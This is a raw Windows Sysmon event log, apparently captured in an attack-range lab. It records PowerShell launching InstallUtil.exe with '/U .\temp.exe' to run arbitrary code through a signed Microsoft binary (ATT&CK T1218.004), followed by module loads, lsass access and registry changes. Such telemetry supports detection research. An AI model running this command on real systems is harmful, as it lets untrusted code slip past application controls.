734700x800000000000000057597810Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:27:23.029{8B6011A9-A3FB-618E-AFFC-04000000F101}3264C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe4.8.3761.0 built by: NET48REL1.NET Framework installation utilityMicrosoft® .NET FrameworkMicrosoft CorporationInstallUtil.exeMD5=AF862061889F5B9B956E9469DCDAE773,SHA256=AF5CBD35C7D8DEA7D879113FDA61B0F64AC6618BCDAE15C0C732A018BABF68EEtrueMicrosoft CorporationValid 10341000x800000000000000057597809Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:27:23.029{8B6011A9-888A-6164-7000-00000000F101}34483876C:\Windows\system32\csrss.exe{8B6011A9-A3FB-618E-AFFC-04000000F101}3264C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057597808Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:27:23.029{8B6011A9-EC34-6172-79B6-01000000F101}86407060C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-A3FB-618E-AFFC-04000000F101}3264C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+50f0099(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45734f2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+457312d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+503b45b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+453009f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4593b11(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45759b1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45666d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4573c13(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4573785(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45734f2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+457312d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+503b45b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45583d8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+455794a(wow64) 154100x800000000000000057597807Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:27:23.011{8B6011A9-A3FB-618E-AFFC-04000000F101}3264C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe4.8.3761.0 built by: NET48REL1.NET Framework installation utilityMicrosoft® .NET FrameworkMicrosoft CorporationInstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" /logfile= /LogToConsole=false /U .\temp.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false .\temp.exeC:\Users\Administrator\Desktop\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=AF862061889F5B9B956E9469DCDAE773,SHA256=AF5CBD35C7D8DEA7D879113FDA61B0F64AC6618BCDAE15C0C732A018BABF68EE{8B6011A9-EC34-6172-79B6-01000000F101}8640C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x800000000000000057599405Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.984{8B6011A9-A459-618E-BEFC-04000000F101}352ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Users\Administrator\AppData\Local\Temp\2\T1218.004.InstallStateMD5=A98209979976566EFA95C72A0DF69FB6,SHA256=CA8E67928052DAACF925BDC622EBB5F9DF8D0033464916FC84D392F46F60429Bfalsetrue 734700x800000000000000057599404Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.984{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Servd1dec626#\367b724a8a8d7a8816e8029637e9af91\System.ServiceModel.Internals.ni.dll4.8.4261.0 built by: NET48REL1LAST_BSystem.ServiceModel.Internals.dllMicrosoft® .NET FrameworkMicrosoft CorporationSystem.ServiceModel.Internals.dllMD5=D9D712B2F98C74C18C71B40FBFF12C72,SHA256=C1CB9C1223FFBBFA879B7972A34AD437C308829152CFF855802A6350C75B46A7false-Unavailable 734700x800000000000000057599403Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.984{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\SMDiagnostics\32788288a07982cb10ab4196907ef578\SMDiagnostics.ni.dll4.8.4261.0 built by: NET48REL1LAST_BSMDiagnostics.dllMicrosoft® .NET FrameworkMicrosoft CorporationSMDiagnostics.dllMD5=6520C012D5164F22C0A4F96E82F7979A,SHA256=BD1F07E923DBA63862A75A4D312268EFF3391C155C1103B20964DF8F7E21D5C1false-Unavailable 734700x800000000000000057599402Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.969{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Runteb92aa12#\8a6f1fd5072bb947ca74e50ce391a3d3\System.Runtime.Serialization.ni.dll4.8.4261.0 built by: NET48REL1LAST_BSystem.Runtime.Serialization.dllMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Runtime.Serialization.dllMD5=D2D5D6F2005BB57034DBE003EE9D14A0,SHA256=53E2A4CB20464A9CDCE924F9513882F3DA575DBE10B68C9437EA37C074AEA798false-Unavailable 734700x800000000000000057599401Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.969{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x800000000000000057599400Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.969{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x800000000000000057599399Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.969{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 734700x800000000000000057599398Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.969{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057599395Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.969{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704trueMicrosoft WindowsValid 734700x800000000000000057599394Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.969{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\shell32.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=837B8644B9CE47EC28152E7D764886E0,SHA256=C5BA64473FB38E6B4592EAFA642AF82715CBC676190985D8D8D4150CE840044FtrueMicrosoft WindowsValid 734700x800000000000000057599393Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.969{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\e1c9eb2e855d26a67dbf39e6236430de\System.Xml.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Xml.dllMD5=695EB4BE24FC9DB279F2427D31AD35D4,SHA256=014EDA5BD7025A6F01BEA1F6E05663FE4BCE64FA95B7378EBF9C827991B32E64false-Unavailable 734700x800000000000000057599392Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.953{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\5b778442ed2d60a5de14f752a124bf1a\System.Configuration.ni.dll4.8.4190.0 built by: NET48REL1LAST_BSystem.Configuration.dllMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Configuration.dllMD5=9EAA59368783AFE4107F28B6ED8AB1E6,SHA256=BBAC50983BA9B2EDA9CBA8FD0F1DCABF71D24D736A973BA164AF6917A3FC2E7Ffalse-Unavailable 734700x800000000000000057599391Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.953{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\625a7ccd665c33cee4988e3cd136b902\System.Core.ni.dll4.8.4395.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Core.dllMD5=27741782AAECFE54A201896D93BA1C9A,SHA256=7389517EE682897300DE398245D2C3EE37E5060CF6320138430A8AA86E6E737Bfalse-Unavailable 734700x800000000000000057599390Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.953{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057599389Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.953{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 734700x800000000000000057599388Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.953{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899trueMicrosoft WindowsValid 734700x800000000000000057599387Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.953{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575trueMicrosoft WindowsValid 734700x800000000000000057599386Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.953{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\windows.storage.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=1D7997E3AFC26B85024D33F835E18056,SHA256=B2376967E156D4971FB66059F6367030AF937943D2EBF80AF856E643B6E95BBFtrueMicrosoft WindowsValid 13241300x800000000000000057599385Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 17:28:57.953{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetectDWORD (0x00000000) 13241300x800000000000000057599384Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 17:28:57.953{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranetDWORD (0x00000000) 13241300x800000000000000057599383Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 17:28:57.953{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetectDWORD (0x00000000) 13241300x800000000000000057599382Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 17:28:57.953{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranetDWORD (0x00000000) 10341000x800000000000000057599381Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.953{8B6011A9-886B-6164-0B00-00000000F101}6481820C:\Windows\system32\lsass.exe{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057599380Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.953{8B6011A9-886B-6164-0B00-00000000F101}6481820C:\Windows\system32\lsass.exe{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057599379Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.953{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=5061339CE61C0B32DB8F51A95E3B2422,SHA256=60558CA374334D4C6BBAD475921538C14A9FF3422893348A0503C1F33015FD25trueMicrosoft WindowsValid 12241200x800000000000000057599378Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 17:28:57.953{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap 734700x800000000000000057599377Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.953{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057599376Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.953{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 734700x800000000000000057599375Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.953{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\iertutil.dll11.00.14393.4467 (rs1_release.210604-1844)Run time utility for Internet ExplorerInternet ExplorerMicrosoft CorporationIeRtUtil.dllMD5=1D608361848C3A3AC56488995E8D0BB1,SHA256=D95DE5DBAD08E22CB0CFB9322220E752F16124C15867F7748E4D64795E400EBFtrueMicrosoft WindowsValid 734700x800000000000000057599374Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.953{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=D287E1BC5A148E2BCB482DBD0E925738,SHA256=1C2428AD170165DD8DE960C835D9AAB5B268300A676FE935B177ED5D2607430DtrueMicrosoft WindowsValid 734700x800000000000000057599373Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.953{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\urlmon.dll11.00.14393.4530 (rs1_release.210705-0736)OLE32 Extensions for Win32Internet ExplorerMicrosoft CorporationUrlMon.dllMD5=B63DBDFEC215CF37259DC4A88ADBD0E7,SHA256=67B02F3DE0AF36E76C2D259CE7833EDA4FE33D935538E8A4C1E7E82130870FC1trueMicrosoft WindowsValid 734700x800000000000000057599372Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.937{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\bcacaaa795f281ac827a1af051d3a051\System.Configuration.Install.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Configuration.Install.dllMD5=DF0A266E1C073131336B9597E2543820,SHA256=F1079A19E1C6E19EB1A2BA701A3919A0A0474EDFA579D8F3EC05965ECDF5F6FDfalse-Unavailable 734700x800000000000000057599371Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.937{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll4.8.4380.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.dllMD5=C928B5301D291782935A1342A01F6125,SHA256=945ACD65BDCE2291C3C2D15FD910F6E331570D516D386C53FDFB5EC38BE69125false-Unavailable 734700x800000000000000057599370Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.937{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\clrjit.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Just-In-Time CompilerMicrosoft® .NET FrameworkMicrosoft Corporationclrjit.dllMD5=0745D9F1BAC58E47CC87656768304313,SHA256=BBA1936354A9EF269B283FE706A74B73BE39CAF4DD57AB0D1CD06A1C75E260A2trueMicrosoft CorporationValid 734700x800000000000000057599369Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.937{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x800000000000000057599368Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.922{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\474c5d5d840d0a8b1974061ff11f02c2\mscorlib.ni.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft Common Language Runtime Class LibraryMicrosoft® .NET FrameworkMicrosoft Corporationmscorlib.dllMD5=9955B914F307F0142D003E93A3A500BE,SHA256=1247284354586C375597AD8046AAC7F983BAAC74B545B674FB12DB4BAC5C6C01trueMicrosoft CorporationValid 734700x800000000000000057599367Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:57.922{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=1AF6CD8B7CE4A852F67AA98C71AA1D26,SHA256=EF0DE008500A8C9C7908383AF11AE55845EBBE28C96C013EA720950BA89D3D28trueMicrosoft WindowsValid 734700x800000000000000057599366Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 